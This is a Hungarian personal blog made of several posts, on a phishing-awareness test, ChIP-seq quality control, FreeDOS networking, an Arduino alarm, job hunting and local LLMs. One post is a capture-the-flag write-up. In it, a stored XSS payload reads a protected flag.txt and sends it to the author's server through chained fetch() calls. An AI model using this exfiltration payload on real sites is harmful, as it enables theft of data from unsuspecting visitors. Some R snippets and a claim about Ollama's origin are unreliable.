Az élet kódjai

Az egyetem, ahol dolgozom, nagy hangsúlyt fektet a spamek visszaszorítására. Még online képzési anyagot is összeállítottak a felhasználók oktatására, amit kötelező volt elvégezni.

Egy hét elteltével megint kaptam egy spam-et, amit szokás szerint megvizsgáltam. A feladó valami office365online címről küldte a leveleket, amit könnyű összekeverni az office365-el, amit az egyetem is használ. Az első furcsa dolog az volt, hogy a spam UUID-t használt az URL-ben. Az eddigi spamek nem sokat foglalkoztak ilyesmivel, mindenki ugyan azt az emailt kapta. Az egyedi azonosító azt feltételezi, hogy van egy adatbázis is, ahol az UUID és az email címet összekapcsolják. Nem is mertek ráklikkelni, mert a szerver már azt is loggolhatja.

A támadók tehát bejegyeztek egy domaint, nem feltört oldalakról küldték a spam-et. Gondoltam megnézem az IP cím geolokációját. Itt jött a második meglepetés. A IP az egyetem hálózatához tartozott! Mi a fene? Feltörték az egyetem egyik szerverét és onnan küldik a spam-et? Ennyit ér a sok képzés, kibervédelem? Már az egyetemről kapjuk a spam-et?

Elkezdtem nézegetni a webszervert, hátha az UUID-s link nélkül is találok valamit, de nem találtam semmit. UUID ide vagy oda, kénytelen vagyok megnézni a linket. Mint az várható is volt, emailt és jelszót kértek, de a forráskód elemzéséből az derült ki, hogy nem volt HTML form-ba ágyazva. Teljesen összezavarodtam. Feltörnek egy szervert, adatbázissal megpakolt webszervert futtatnak rajta, spam-et küldenek, majd a lopott jelszavakat nem tárolják. Ennek semmi értelme!

Elkezdtem nézni a summit gombhoz tárolt eseményeket. A javascript kódban volt egy URL, amire akkor ugrik az oldal, ha a felhasználó ráklikkel. Megnézem mi az. Egy üzenet volt rajta: "Ne adja meg a jelszavát idegen weboldalakon. Köszönettel: IT részleg."

Francba! Az egyetem csak a képzés hatékonyságát mérte. A sok bohóckodásommal most biztos úgy tartanak nyilván, mint akinél nem volt eredményes az oktatás, és gondolkodás nélkül megadja mindenhol a jelszavát.

Az immunoprecipitáción alapuló szelvenálási módszerek sokkal körültekintőbb ellenőrzést igényelnek, mint a "hagyományos" DNS vagy RNS szekvenálás. Bár a címben ChIP-seq szerepel, az itt leírtak szinte minden immunoprecipitáción alapuló módszerre (CUT&RUN, ChIP-exo, Dip-seq) alkalmazhatóak.

Az első lépés természetesen a kapott FASTQ fájlok ellenőrzése például a FastQC programmal. Itt ugyan azok az elvek érvényesek, mint bármilyen más szekvenálás ellenőrzésénél, bár a szekvencia duplikáció magasabb lehet, mivel a teljes genomnak csak egy kis részét szekvenáljuk. Ha a FASTQ fájlok megfelelőek, akkor más módszereknél megnyugodhatunk, hogy az elemzéssel nem várható komoly gond (hacsak nincs kontamináció), viszont ChIP-seq akkor is lehet használhatatlan, ha a FASTQ fájlok tökéletesek.

A szekvenciák illesztése ugyan úgy zajlik, mint más esetben. Amennyiben adaptor szennyezést tapasztaltunk, természetesen azokat levághatjuk, de a BWA úgysem illeszti az idegen részeket. Az illesztett readek aránya ugyancsak hasznos információ, 90% alatt nem szabadna lennie.

Utána jöhet a peak keresés. Ezt legtöbbször a macs3-al végezzük, de meg kell jegyezni, hogy bár ez a legelterjedtebb peak kereső, vannak más alternatívák, és lehetnek olyan kísérleti elrendezések, ahol a macs3 nem a legjobb választás. Ökölszabályként elmondhatjuk, hogy 10 ezer alatti peakszám valami problémát jelent.

Az immunoprecipitáció nem egy egyszerű lépés, ezért minden mintát kétszer szekvenálnak meg. Van egy úgynevezett "input", ahol a szekvenálás immunprecipitáció nélkül történik. A párja természetesen az "IP", ahol a korábban említett lépést nem hagyják ki. Ez a két minta alkot egy egységet. Bár vannak bátrabb bioinformatikusok, akik input nélkül elemeznek, és tőlem is többször kérték, hogy "azért nézzük meg input nélkül is...", tudni kell, hogy a sokkal jobb jel-zaj arányt kapunk, kevesebb lesz a fals pozitív, ha inputot is használunk.

A peak fájlok BED formátumúak, a fő információ a kromoszóma koordináta, a legtöbb program azt használja, még akkor is, ha a macs3 további értékeket tárol.

ChIPQC

Ez egy nagyon jó R csomag lenne, ha nem tartalmazna 11 éves elavult függőséget, ami miatt a legújabb Bioconductor nem tartalmazza. Nekem is csak azért működik, mert kézzel forgattam a csomagot és a kérdéses függőséget. Használata nagyon egyszerű:

sample <- ChIPQCsample("ip.bam", peaks="NA_peaks.narrowPeak", annotation="hg19")

A két minta közül az IP-t kell megadni illesztésként, a peak fájlt, valamint a genom annotációját. Táblázatos formában megkapjuk az összes hasznos minőségi mutatót a következő paranccsal:

QCmetrics(sample)

Lássunk egy kimenetet:

      Reads    Map%  Filt%  Dup%  ReadL   FragL RelCC   SSD  RiP%
3320201.000 100.000 37.700 0.000 51.000 174.000 0.683 0.237 2.210 

Ez egy tipikusan rossz kísérletből származik. Habár a readek 100%-a illeszkedik a genomra (ez a duplikáció kiszűrése utáni BAM fájl, de eredetileg is 96% volt. És ezért 0% a Dup oszlop), a peakekre csak a readek 2,21% esik (RiP, read in peaks), ami nagyon rossz. Az SSD a normalizált lefedettségből készített hisztogram szórása, amire a dokumentáció azt írta, "minél nagyobb, annál jobb". Nos, jó kísérleteknél ez 20-40 is lehet, de tipikusan 2-3. A 0.237 nem elfogadható. Végül a RelCC egy olyan mérőszám, ami a forward és reverz readek lefedettsége között számol korrelációt.

DiffBind

Ez a csomag különbségeket keres a kezelt mintában, viszont van pár nagyon hasznos funkciója, amivel a minták minőségét vizsgálhatjuk. Ha vannak ismétléseink, és nem csak egy mintával akarjuk megváltani a világot, akkor fontos tudni, hogy van-e batch effekt, nem történt-e minta összecserélés, vagy bármi olyan, amit a laborosok kerek perec képtelenségnek tartanak (és amiről utólag kiderül, hogy nem is olyan képtelenség).

A program használatához készíteni kell egy DataFrame-et, ami tartalmazza a mintákat, illesztett BAM-ok, peak-ek elérési útját, kezelést, ismétlések számát, . Ezen kívül bármilyen más információt felvihetünk, de ez a minimum, ami szükséges.

sampleSheet <- data.frame(SampleID=c("c1","c2","em1", "em2"),
Tissue=c("unknown", "unknown","unknown","unknown"),
Treatment=c("control","control","treatment","treatment"), Replicate=c(1,2,1,2),
 bamReads=c("bams/c1ip.bam", "bams/c2ip.bam", "bams/em1ip.bam", "bams/em2ip.bam"),
 bamControl=c("bams/c1input.bam", "bams/c2input.bam", "bams/em1input.bam","bams/em2input.bam"),
 Peaks=c("peaks/C1/c1_peaks.narrowPeak", "peaks/C2/c2_peaks.narrowPeak", "peaks/EM1/em1_peaks.narrowPeak"),
 PeakCaller=c("narrow","narrow","narrow","narrow"))

Ezután létrehozunk egy adatbázist a fenti információkkal:

sample <- dba(sampleSheet = sampleSheet)

Ha megvagyunk az adatbázis elkészítésével, jöhetnek az érdekes plotok. Először is egy PCA:

dba.plotPCA(samples, label=DBA_ID)

Ha a minták nem a kísérleti elrendezés szerint csoportosulnak, akkor valami gond van.

Homer

A Homer egy mindent az egyben csomag. Nagyon könnyű használni, a nehézségét az adja, hogy annyi minden van beleépítve, hogy elsőre a felhasználó azt sem tudja, mit futtasson. Dedikált QC elemzés nincs benne, nem ír ki számokat, de az elemzés során ad szöveges megjegyzéseket a minőséggel kapcsolatban. Például a peakCall parancs adhat ilyen eredményeket:

Guessing sample is ChIP-Seq - uneven enrichment between same strand and
different strands - may have problems such as clonal amplification.

IGV

Bár az IGV nem számol semmit, segít, hogy egy általános képünk legyen az illesztésről. Ha szemmel nem látunk feldúsuló readeket, akkor a programok sem fognak peakeket találni.

Korábban három kívánságom volt egy FreeDOS-os laptoppal kapcsolatban: 1 SoundBlaster beállításokkal legyen hangja, lehessen netezni vele, működjön az USB. A Compaq csak az utolsót tudta teljesíteni, azt is kritikán alul. Olyan lassú rajta az USB, hogy jobban megéri CD-ről bootolni egy Linuxot, csatolni a FreeDOS meghajtót, rámásolni a stuffot és újraindítani. Hálókártya pedig nincs rajta, csak valami PCMCIA kártyával lehetne netet varázsolni rá, de eddig nem találtam megfelelő hardvert.

Régi laptopot viszont könnyebb szerezni, mint hálókártyát. Van egy HP OmniBook XE4500-am. Az aksija természetesen halott volt, de még lehet hozzá kapni utángyártott alkatrészt, úgyhogy nem nekem kellett szerelni.

Hátrányai: kissebb felbontások a képernyő közepén vannak, hatalmas fekete sávval körbevéve. Az SBEmu nem szereti a hangkártyát, az felejtős. Apropó hang. A HP-nál egy mérnök remek ötletnek gondolta, hogy a beep teljes hangerőn robbanjon a beépített hangszórókon. Ha megnyomom a TAB-ot, és nincs olyan fájl, amire kiegészíthetné, akkorát szól a gép, hogy a lakás másik végén megijed a gyerek. Egyik alkalommal véletlenül megtöltöttem a billentyőzet puffert, mire folyamatos teljes hangerőn pittyegett. Egy üres jack dugót szoktam a fülhallgató kimenetbe kötni, azzal némítom. Miért nem némítom a BIOS-ban? Természetesen azért, mert a BIOS beállítások olyan limitáltak, mintha egy táskarádiót akarnék testre szabni.

Viszont gyorsabb, nagyobb tárhelye van, mint a Compaq gépnek, a ventillátor csendesebb.

ÉS MEGY AZ INTERNET!

A FreeDOS hálózati képességek lelke a packet driver. Ha találsz drivert a hálókártyához, akkor lesz net, egyébként meg nem. Sajnos a laptophoz elérhető doksik elég kezdetlegesek, a hálókártya típusát nem sikerült meghatározni, ezért Linux alól szedtem némi információt. A gyártónak a Crywnr bizonyult, úgyhogy leszedtem minden packet drivert, ami valamilyen módon kapcsolódik ehhez a gyártóhoz, rámásoltam a gépre, és elkezdtem próbálgatni. Végül a C83815 drivre bizonyult jónak. Csupán egyetlen paramétert kell megadni, a szoftveres megszakítás címét. Ez a legtöbb esetben a 0x60.

C83815.COM 0x60

Utána jönnek a programok. Mivel a DOS-ban nincs dedikált hálózati alrendszer, ezért a programok egy konfigurációs fájlon keresztül szedik az információt, hogyan is kapcsolódjanak a netre. Az első program a DHCP.EXE, ami ezt az állományt előállítja.

DHCP.EXE

A program beállítja az ip-t, DNS-t, stb. és letárolja az C:\FREEDOS\MTCP.CFG fájlba. Mikor láttam, hogy a gép ip-t kapott, nagyon örültem. Meg akartam pingelni a routert.

PING 192.168.0.1

Kaptam egy szép hibaüzenetet: "Your DHCP lease expires in less than 3600 seconds" A Gemini szerint ez azért van, mert rossz a driver. Gondoltam magamban, hogy ez egy hülyeség, mert akkor nem lenne a gépnek ip címe sem. Mint kiderült az AI ezt egy fórum bejegyzésből vette, ahol az egyik hozzászóló szóról-szóra ezt írta. Szóval csak óvatosan ezekkel a gyorsan generált válaszokkal! Megoldást nem találtam, de mivel a hibaüzenet egy érték miatt volt, kézzel átírtam a lease értéket jó nagyra. És onnantól ment a ping!

A következő ötletem az volt, hogy valami értelmeset is csináljunk a nettel. Weboldalak szóba sem jöhetnek, mert hozzájáruló nyilatkozatokra sem tudok ráklikkelni. Nézzük meg az FTP-t! Kik használnak még anoním FTP-t? Hát persze, hogy a scenerek! (Meg persze a bioinformatikusok, de mit kezdjek egy genommal FreeDOS-on?)

FTP FTP.SCENE.ORG

Beléptem, és letöltöttem Tomcat Kocka demóját, majd elindítottam.

Módosítom a kívánságlistát: Nem kell USB támogatás a FreeDOS-os laptopra. Működő net és hangkártya kell.

A riasztó fals jelzései nagyon aggasztottak, ezért elkezdtem kicsit jobban utánajárni a dolgoknak. Először is, megnéztem, mások mit tapasztaltak az ultrahang szenzor pontosságával kapcsolatban. Habár a szenzornak van hibája, másoknál ekkora hibát nem eredményezett, mint nálam. Valamit rosszul csináltam.

Először készítettem egy másik, egyszerűsített összeállítást, ahol csak egy Arduino és egy szenzor volt összekötve. A hiba mértéke sokkal kisebb volt. Ezután elkezdtem cserélgetni a komponenseket. Másik szenzort, másik Arduinót használtam (mert a riaszóban egy Arduinó klón volt), de a szórás továbbra is alacsony maradt. Még azt is megnéztem, hogyan változik a mérés pontossága, ha nem 5V-al, hanem csak 3V-al táplálom a szenzort, de a pontosságot csak nagyon kis mértékben befolyásolta, hibahatáron belül volt.

Ez csak egyetlen dolgot jelenthet: a szervómotor áramfelvétele befolyásolja a mérést. Az én összeállításomban ugyanis a szervót is az Arduinó látja el árammal, amit nem tartanak jó ötletnek, de mivel a próbapaneles összeállítás alatt jól működött, gondoltam figyelmen kívül hagyom a javaslatot. Úgy látszik ez mégsem volt bölcs dolog.

A rendszert átalakítottam, hogy a szervót külső áramforrásból tápláljam. Három félig lemerült gombelemet forrasztottam össze, ami 8,5V-ot adott le. Gondoltam elég lesz a tesztekhez. Feltöltöttem a a kódot, és reménykedtem.

Sajnos a külső áramforrás nem volt elég a motornak, pár halk kattogást leszámítva nem csinált semmit, de a fals risztások száma lecsökkent. Nem szűnt meg teljesen, de lecsökkent.

A prototípusból a következő következtetéseket tudom levonni: A motor használata nem jó ötlet. Elveszi az áramot a többi komponenstől, elmászik a helyéről a riasztó forgatás közben, a szerkezet instabil lesz . Csak a gond van vele. Jobb lett volna 3 ultrahang szenzort használni, amelyek különböző irányokba mutatnak, mint egyet forgatni.

Csupán egyetlen kérdést tettek fel, hogy mi a http://ip_cim:8080/flag.txt tartalma. Hmm, akkor ez valami webes bűvészkedés lesz. Az nmap és többi kutyafülét teljesen ki lehet hagyni.

A böngészőbe természetesen 403-as hibát kapunk, ha megpróbáljuk megnyitni a kérdéses fájlt. Tehát rá kell venni valakit, hogy öntudatlanul nyissa meg nekünk :-)

A weboldal nagyon egyszerű, van rajta két kép, meg egy ígéretes komment küldési lehetőség, amit a leírás szereint valaki feldolgoz. Ez az! Ő lesz a célpont.

Elindítottam egy webszervert a gépemen:

python3 -m http.server 80

Készítettem egy darab png képet is mouse.png néven, ha már úgyis macskás képek vannak.

Az első kísérletek nagyon bíztatóak voltak. Ha a komment szekcióba beírom a következő sort:

<script>fetch("http://my_machine_ip/mouse.png");</script>

A saját gépem webszerverén láttam, hogy a képet letöltik. Ezek szerint semmilyen JavaScript szűrés nincs, a weboldalon cross-site scripting sérülékenység van. Szuper! A feladat akkor, hogy kell írni egy JavaScript kódot, ami a rendszergazda gépén lefut letölti a flag.txt tartalmát (mert az a gép korlátozás nélkül hozzáfér a flag.txt-hez) és elküldi nekem.

Ekkor döbbentem rá, hogy már nagyon-nagyon régen írtam JavaScript kódot, és a világ kicsit megváltozott azóta. Az első sorban biztos voltam:

const result = fetch("http://127.0.0.1:8080/flag.txt")

A komment olvasójának a flag.txt a localhost-on lesz, a fájl tartalmát be kell olvasni. Az utána következő sorok rendre kudarcot vallottak, mert nem tartalmazták a letöltött fájlt. Némi keresgélés után rájöttem, mi a baj. Ez a folyamat aszinkron, tehát csak akkor szabad a második lépésre mennem, ha a letöltés befelyeződött.

.then(response => response.text())

Ha pedig megvan a fájl tartalma, jöhet egy új kérés az én szerverem felé, ahol GET-es paraméterrel letöltöm az egeres képet.

.then(data => {
   return fetch("http://my_machine_ip/mouse.png?" + data);
})

Elküldtem a kommentet, és vártam a csodát. Fél percen belül láttam is a letöltést. A kérdőjel után ott volta flag!

- Bemutatkozna, kérem?
- A nevem Bond, James Bond.
- Az önéletrajza nagyon impozáns. Legalább húszszor megmentette a világot.
- Huszontötször, hogy pontos legyek.
- Nem jelölt meg fizetési igényt.
- Mert nem számít, egészen addig, amíg a gazdasági igazgatóval blackjack-ezhetek.
- Cégünk határozottan elítéli a blackjack-et.
- Texas hold'em-ben is jó vagyok.
- Félreértett. Nem toleráljuk a szerencsejátékot. Miért jelentkezett cégünkhöz?
- A HR-es kisasszonynak szép a mosolya.
- Nem, nem, nem. Cégünk irányelvei határozottan tiltják a szexista megnyilvánulásokat.
- Egy vodka-martini mellett megbeszélném vele a részleteket. A fülembe súghatná azokat a szexista megjegyzéseket, csak, hogy tudjam, mitől óvakodjak.
- Köszönjük, hogy időt szakított ránk!

- Megtudhatnánk a nevét?
- Jack Bauer.
- Hogyan viszonyul a túlórákhoz?
- Néhányszor 24 óráztam.
- Nem okoz gondot Önnek szétválasztani ilyen esetekben a magánéletet a munkájától?
- A kettő összekuszálódik nálam, de ha megoldom az egyiket, valahogy a másik is megoldódik.
- Értem. Az önéletrajzában említi, hogy unortodox megoldási módszerei vannak. Mondana egy példát?
- Egyszer levágtam egy pedofil fejét...
- Köszönjük...
- Lábon lőttem egy barátom feleségét.
- Elég lesz...
- Fegyverrel leszállásra kényszerítettem egy utasszállító gépet.
- Most jut eszünkbe, nem is akarunk felvenni senkit.

- Mr. Hunt, meséljen az erősségeiről!
- Művészi szinten rajzolok, négy nyelven beszélek, bármilyen járművet elvezetek, tudok szájról olvasni, fotografikus memóriám van, búvárkodom felszereléssel, és anélkül, puszta kezes hegymászás a hobbim, szeretek futni. Nagy nyomás alatt is jó döntéseket hozok. Remekül dolgozom csapatban és egyedül is.
- Nagyon meggyőző! Lássunk egy példát a jó döntéseire. Képzeljük el, hogy közösségi médiában egy hátrányos hír jelenik meg a cégről. Hogyan kezelné az esetet?
- Hagynám, hogy a hírt minél több médium átvegye.
- Ez nem tűnik produktívnak...
- Hadd fejezzem be. Hagynám, hogy a rossz hír minél jobban aláássa a cég hírnevét. Mikor kijönnek az adóhatóság emberei, akkor mindent magamra vállalok és elmenekülök. A hajsza során több országon keresztül utaznék, majd az utolsó pillanatban megoldanám a problémát. Valószínűleg egy másodperccel a cég teljes felszámolása előtt, valamilyen hajmeresztő mutatvány kíséretében.
- Kihagyná a vezetőséget minden döntéséből?
- A vezetőségnek feltétlenül bíznia kell bennem és a képességeimben, még akkor is, ha semmilyen információt nem adok nekik.
- Más megközelítést nem tud elképzelni?
- Higyje el, ha lenne más megoldás, azt tenném.
- Értem. Hogyan viszonyul a mesterséges inteligenciához.
- Nem kedvelem. MI nélkül is mindig a legjobb döntést hozom.

- Mr. Statham, úgy tűnik Önnek szerteágazó tapasztalata van a legkülönbözőbb munkakörökben.
- Valóban. Voltam sofőr, méhész, építőipari munkás és biztonsági őr is.
- Miért váltogatta a munkahelyeket?
- Bárhová kerültem, mindig feltűnt egy szervezett bűnözői csoport, akik ártottak a velem élő embereknek.
- Mi történt a bűnözőkkel?
- Meghaltak.
- Ennek van köze ahhoz, hogy Ön korábban különlegesen kiképzett katona/kommandós/black ops/titkos ügynök/bérgyilkos volt?
- Nem, ez csak szokatlan egybeesés.
- Szokott Ön mosolyogni?
- Csak ha méreg van a szervezetemben.

A nevelésben az egyik legfrusztrálóbb dolog, hogy hiába mondok valamit a gyereknek, tuti, hogy nem hallgat rám. Másodszor is elmondom, arra sem figyel. Ezért harmadszor már nem ismétlem el az intelmeket, csak hagyom, hogy fejjel menjen a falnak, és akkor emlékeztetem: már kétszer figyelmeztettelek.

Azt hittem, a taktika működik, és egy idő után rájön, hogy figyelnie kellene a szüleire, de nem. Mintha egy láthatatlan tolmács a fejében mindent félre fordítana.

Másfél évvel ezelőtt kért egy telefont. Én a korábbi akciói után annyit mondtam, hogy neki is spórolnia kell rá, nem fizetjük ki a teljes vételárat, és nem kaphat új készüléket, csak használtat. Valamint ez lesz az utolsó készülék, amit tőlünk megkap.

Miután megkapta az ajándékot, az elején nem is volt semmi gond. Ahogy telt az idő, úgy vált szegény készülék egyre több agresszió áldozatává. Végül a képernyő megadta magát. A feleségemmel tartottuk is magunkat az ígéretünkhöz, és nem cseréltük ki, nem adtunk pénzt a javításra. Gyermekem kénytelen volt az összespórolt pénzét új kijelzőre költeni. Javasoltam neki, hogy ha már úgyis szét kell szerelni, vegyen bele új aksit is. A rendelési folyamatba is bevontam, hogy lássa, milyen opciók vannak.

Mikor az alkatrész árakat látva húzta a száját (pedig ezek még utángyártott alkatrészek voltak, nem is eredetiek), mondtam neki, hogy egy szervíz pluszba munkadíjat is felszámolna, én viszont ingyen kicserélem. Ez lesz a karácsonyi ajándékom.

Az iFixIt utasításait követtem. A képernyő ragasztója nagyon nehezen engedett. Fél óra melegítés után tudtam egy kis rést ejteni rajta. Utána is elég nehéz volt, de legalább megindult a szétválasztás. A képernyő leemelése után apró, 1mm-es csavarokat kellett eltávolítani, hogy a szalagkábelek csatlakozóihoz hozzáférjek.

A rossz akkumulátor eltávolítása sem volt zökkenőmentes. A ragasztó szalagokat nem tudtam kihúzni, mert eltépődött valamennyi. Etil-alkoholt fecskendeztem az összeragasztott felületek közé, csak utána tudtam csak kivenni az akkumulátort.

A leírás szerint a szenzorokat is ki kellett volna kötni, de mivel nekem lejött az egész képernyő, nem értettem, erre miért van szükség. Kicsomagoltam az új képernyőt, és akkor jött a döbbenet. A cserealkatrészen apró fém fülek voltak, amelyek hiányoztak az eredetiből. Ráadásul az új képernyő nem akart a helyére menni.

Teljesen tanácstalan lettem. Egy videó, és a két képernyő összehasonlítása után viszont rájöttem, hogy én nem kiszereltem a képernyőt, hanem szétszedtem azt. Egy műanyag keret továbbra is a telefonban van! Fogalmam sem volt, hogyan fogom onnan kibányászni. A videón egy pengével vágták körbe a képernyő és a hátlap közötti részt, így én is ezt tettem.

A keret eltávolítása után jöttem rá, miért kell a szenzorokat is kiszerelni. Azok ugyanis ebben a keretben foglaltak helyet. Ezt a lépést nagyon óvatosan csináltam, mert a szenzorok egy nagyon vékony kábel különböző pontjain helyezkedtek el, és nem akartam elszakítani semmit.

A szenzorokat áthelyeztem az új képernyő megfelelő helyeire és visszakötöttem mindent. A kis csavarok persze nem akartak a helyükre ugrani, sőt többször össze is kevertem, melyik csavar melyik helyre megy. Alig láttam a hornyokat, így az sem volt egyértelmű, melyik bit kell a 144-ből, hogy be tudjam hajtani. A legjobban akkor izzadtam le, mikor ezek a pici vackok leestek a földre. Még szerencse, hogy a mágnes gyorsan megtalálta mindet.

Sok próbálgatás után minden alkatrész a helyére került. Egy profi biztosan pár óra alatt megoldotta volna, nekem 13 óra volt, mire ismét be tudtuk kapcsolni. Viszont működött! Illetve először az iOS torkán is le kellett nyomni a szervízelést.

A bekapcsolás után ugyanis elkezdett nyivákolni, hogy nem eredetiek az alkatrészek, és nem tudja ellenőrizni az állapotukat. Az első 1-2 töltés szenvedés volt. Éjjel, kikapcsolt állapotban teljesen lemerült. Kiderült lányom a töltőkábellel sem bánt túl humánusan, az is kontakt hibás volt. Az Ultimate64-hez használt tápegységem sem volt elég jó ennek a nyomorult készüléknek, egyfolytában "lassú töltés" üzenetet adott. Miért nem elég neki 65W-t? A kábelcsere utána normalizálódott a helyzet, de addig kaptam a fejemre a lányomtól: Tönkretetted! Teljesen használhatatlan! Ez a te hibád! Nem fizetem ki az alkatrészeket, mert nem működik a telefon!

A javítás idejére odaadtam az egyik telefonomat, hogy azt használja. Hallottam, amikor a barátaival beszélgetett: Most apa telóját használom, olyan régi, hogy még emoji sincs rajta. Rossz helyen van az Y, mert ez egy béna telo. Laggolok!

Pedig nem is a PinePhone-t kellett használnia. Az lett volna csak a kultursokk!

A tablet szerelése után elég jól tudtam hasznosítani a hibás képernyőt, de az IPhone-ból semmi használhatót nem lehetett kinyerni.

Az előző poszt után nem sokkal rendeződtek a dolgok. Bár az NKFI pályázatba nem fértem bele, mert nem voltam elég fiatal, később kiderült, hogy van a csoportnak egy másik pályázata is, amiből tudnak fizetni nekem. Olyan gyorsan változnak a dolgok, hogy nem tudok velük lépést tartani.

Érdekes lett volna kipróbálni új dolgokat, megnézni, képes vagyok-e valami másra is, de nem jött össze. Úgyhogy maradok bioinformatikus. Ahogy Rambo mondja:

Úgy tudtam, nyárig van szerződésem, de kiderült ez sem igaz. A szerződés hosszabbítás csak December végéig szólt, amitől kicsit sürgetőbbé vált, hogy találjak valamit. Kiderült, ha lesz is szerződésem januárban, az sem nyárig, hanem már korábban lejár. Ezt is a munkaügyön tudtam meg.

Tehát mégtöbb helyre beadtam az önéletrajzomat. A következő állásokra vagyok alkalmatlan. A számok azt jelzik, hányszor utasítottak el (bár tényleges elutasítást csak 3-4 esetben kaptam, a többinél egyszerűen nem válaszoltak, és ha eltelt 20 nap, akkor úgy gondoltam, már nem is fognak).

• SOC Analyst: 2
• Python programozó: 1
• PHP programozó: 1
• Etikus hacker: 4
• Ügyintézői alkalmazott: 1
• Junior információbiztonsági szakértő: 1
• Pentester: 5
• Molekuláris biológus: 1
• Data scientist: 2
• DevOps rendszermérnök: 1
• Bioinformatikus: 1
• Senior Computational Biologist: 1
• C fejlesztő: 1

Nagyon vigyáztam, hogy fizetési igényet ne jelöljek be. Ha mégis kötelező volt, akkor a mostani fizetésemnél alacsonyabb igényt írtam be. A bioinformatikus állásra legalább az első körös interjúra behívtak, ami csak a komptenciákat mérte fel, de úgy látszik, ott sem feleltem meg, mert a második körre már nem került sor. A cybersecurity pozíciók elutasításán annyira nem lepődtem meg, mert nincs szakmai tapasztalatom, de hogy PHP programozónak sem feleltem meg az sértette a hiúságom. Úgy értem, abban tényleg van tapasztalatom, tudtam felmutatni referenciákat, ráadásul egy kisvárosban volt az állás, ahol úgy gondoltam talán kisebb a konkurencia is.

A nagy állásgyűjtő portálok esetén mindig megnéztem, hogy a cég weboldalán fent van-e ugyan az a hirdetés, és csak utána jelentkeztem, mert sok esetben régi, már betöltött állások is fentmaradnak.

A Profession-ön keresztül három állásra jelentkeztem. Ennek az volt az előnye, hogy visszajeleztek nekem, ha elolvasták az önéletrajzomat. Erre általában a jelentkezés benyújtása után a 10. naptári nappal került sor. (Egy esetben egyáltalán nem nézték meg.)

Nem tudom, mi lehet az oka, hogy semmihez nem értek, de az egyik lehetséges okról hallgattam egy podcastot az IT területén tapasztalható életkori diszkriminációról. Az ott hallottak nagyon elkeserítettek. Főleg, mert a két résztvevő rögtön azzal kezdte, hogy lehúzta az idősebb kollégákat, mondván, nem is olyan meglepő, hogy nem akarják őket alkalmazni, mert ők már nem akarnak új dolgokat tanulni, nincs bennük lendület, csak a kényelmes, biztos állásra vágynak. Nem akarnak túlórázni, nem akarják feláldozni magukat a cégért, mint a fiatalok.

Utána a fejvadász átment védekező állásba. Ő ugyanis nem tehet semmit, ha a cég eleve fiatalokat kér, akkor ő kénytelen fiatalokat szállítani. Ezzel a saját felelősségét hárította is. Igaz, utána némileg ellentmondva arról mesélt, hogy mégis "átnyomott" egy idősebb embert a rendszeren. Végül megemlítettek egy "példaértékű" negyvenest, aki egész nap ott ül a gép előtt, hangosan veri a billentyűzetet, még ebédelni sem megy el a többiekkel, csak a kódsorral törődik. (Talán csak retteg, hogy kirúghatják és túlkompenzál.)

A podcast említett megoldást is. Tanulni kell, képezni magadat, bla bla bla. Kérdem én, ha egy jelöltet rögtön az életkor alapján elutasítanak, akkor nem fogják megnézni, mennyit tanult. Esélye sincs megmutatni a tudását. A YouTube megmondóemberek az otthoni labort, blogot szokták megemlíteni. Nekem ezek is vannak, de nem látom, hogy akkora előnyük lenne.

Arról is beszéltek, hogy vannak, akik elrejtik a korukat. Leszednek minden dátumot a Linkedin-ről, maszkolják az önéletrajzot, hogy legalább interjúra behívják őket. Én ezzel nem akarok élni. Először is, az interjún úgyis kiderül a trükk, másodrészt nem hiszem, hogy bocsánatot kellene kérnem a korom miatt. Miért vágjak jó pofát az interjún olyanoknak, akik a születési évemből következtetik ki a képességeimet? Inkább be se hívjanak.

Aminek viszont tényleg van jelentősége, az a kapcsolati háló. Egy ismerősön keresztül sikerült kapcsolatba kerülni egy másik kutatócsoporttal, akik epigenetikával foglalkoznak, nyertek pályázatot, és szeretnének bioinformatikust felvenni. Megbeszéltük, hogy kapok egy adatsort, amivel játszhatok, miközben azt is láthatják, hogyan dolgozom. A próba egy-két zökkenőtől eltekintve szerintem jól ment. Mikor a szerződés részleteiről kezdtünk beszélni, akkor tudtam meg, hogy a pályázatba fiatal kutatót írtak, aki 7 éven belül szerezte meg a PhD-ját. Ha 17 év lenne a határ, abba még beleférnék. Még vizsgálják, hogy milyen lehetőségek vannak. Talán még szerencsém is lesz.

Úgy tűnik, a másik tényező, ami álláshoz juttatja az embert, a szerencse. Nem is veszek több kaparós sorsjegyet, az álláskeresés izgalmasabb szerencsejáték.

Már annyi nagy nyelvi modell van körülöttünk, mint szúnyog a nyári estéken, Korábban nem volt nagy véleményem a technológiáról, mert nem láttam, hogy mi újat tudna nyújtani nekem. Igazából most sem vagyok rácuppanva, de mondjuk úgy, nyitottabb lettem, és kíváncsi lettem, milyen lehetőségek vannak benne. (Vibe coding-ot meg a hasonló hülyeségeket most hagyjuk.)

 Amire én kíváncsi vagyok, mit tudok kezdeni egy LLM-el, amit nem nagy cégek akarnak rámtukmálni drága előfizetésért, és olyan szolgáltatásokkal karöltve, amire nincs szükségem. Egy lokális modellre van szükségem, amit én irányítok.

Ez nem is olyan bonyolult, van rá számtalan módszer. Nyilván egy lokális verzió nem fog versenyre kelni egy kereskedelmi verzióval, de nem is ez a lényeg, hanem a maximális kontroll.

LM Studio

A legegyszerűbb választás az LM Studio. Egy grafikus felhasználói felülettel ellátott program. Fut Windows-on, Linuxon, még az én öreg Slackware-emen is. Klikkeléssel letölti a modellt is (gpt-oss-20b), amit használni akarunk, és már meg is kérdezhetjük, milyen kövér az asszony.

Előnye, hogy könnyen tudunk fájlokat hozzáadni (akár képet is), a szöveg gazdagon formázható, amitől szép lesz a válasz is.

Ollama

Az Ollama egy parancssoros nagy nyelvi modell futtató környezet a Meta-tól, de nyílt forráskódú. Megy Linuxon, Mac-en és Windows-on is, tudja használni a GPU-t is. Először el kell indítani a szolgáltatást:

ollama start

Ezután le kell tölteni a modellt. Van lehetőség felhő alapú futtatásra is, de most a lokális elhetőségeket akarom bemutatni.

ollama pull gemma3:270m

Ez az egyik legkisebb modellt fogja letölteni, ami kb. 300Mb tárhelyet foglal. Utána már használhatjuk is.

ollama run gemma3:270m

Megjelenik a prompt, mi meg írhatunk. Ez egy nagyon kis modell, viszont gyorsan generál rövid válaszokat. Például ha megkérdezem tőle, hogy ki fedezte fel a DNS-t, akkor azt válaszolja, hogy Martin Griffith, aki a Berkley egyetemen dolgozott. James Watson pedig a Watson-Watson vakcina kifejlesztője. Rendkívül tanúságos.

llama.cpp

